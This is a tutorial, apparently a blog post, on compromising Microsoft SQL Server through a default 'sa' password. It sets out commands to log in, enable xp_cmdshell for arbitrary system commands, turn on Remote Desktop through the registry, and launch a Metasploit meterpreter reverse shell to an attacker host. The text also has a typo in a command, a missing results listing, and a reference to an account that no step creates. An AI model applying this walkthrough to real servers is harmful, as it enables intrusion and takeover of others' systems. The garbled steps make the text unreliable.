In this article, we’ll cover connecting to a Microsoft SQL (MSSQL) server from the Backtrack/Linux command line, executing system commands through the ‘sa’ or other administrative account, and finally exploiting the ‘sa’ account through metasploit.
To start with, let’s cover a quick HOWTO on getting an MSSQL client working under Backtrack/Linux. We’ll need freetds and sqsh for this:
apt-get install sqsh freetds-bin freetds-common freetds-dev
Once done, we’ll need to edit /etc/freetds/freetds.conf, and append the following to it:
[MyServer] host = 192.168.1.10 port = 1433 tds version = 8.0
And lastly, we’ll edit ~/.sqshrc:
\set username=sa \set password=password \set style=vert
Finally by issuing:
sqsh -S MyServer
If all went well, we should now be waiting at a prompt. First lets see if we can enumerate a list of available databases with:
SELECT name FROM master..sysdatabases go
Here are the results:
Great, so we’re logged in as the system administrator, ‘sa’ user, and we’ve managed to run a query to enumerate a list of databases. At this point, we can use regular MSSQL syntax to interact with the server and we wish.
Taking a few steps back, by default, the ‘sa’ account has a default password of ‘password’ and on our target system this had not been changed. Assuming the system administrator had set a password, we can use ‘mssql_brute.rc’ from Metasploit or nmap’s ms-sql-brute script to brute force the account password.
Back to the task at hand, now that we have MSSQL sa access, how can this be leveraged to allow for remote code execution? This is where the ‘xp_cmdshell’ feature within MSSQL becomes useful. Prior to SQL Server 2005, xp_cmdshell was enabled by default, however from 2005 onwards, xp_cmdshell was disabled. Assuming that xp_cmdshell is disabled, we first need to enable it as follows:
exec sp_configure ‘show advanced options’, 1 go reconfigure go exec sp_configure ‘xp_cmdshell’, 1 go reconfigure go
We can then use the function to run arbitrary system commands under the context of the SQL Server with:
xp..cmdshell 'dir c:\' go
We now have a working account within the Administrators group, and can proceed to connect to our newly created account via Remote Desktop. If Remote Desktop is not currently running, it can be enabled with:
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' go
As a second route, we can also exploit the account using Metasploit by using mssql_payload:
msf > use windows/mssql/mssql_payload msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp msf exploit(mssql_payload) > set LHOST 192.168.1.120 msf exploit(mssql_payload) > set RHOST 192.168.1.10 msf exploit(mssql_payload) > set LPORT 8080 msf exploit(mssql_payload) > set PASSWORD password msf exploit(mssql_payload) > exploit
The command stager will upload whilst the progress printed to the terminal, and finally:
Game Over 😉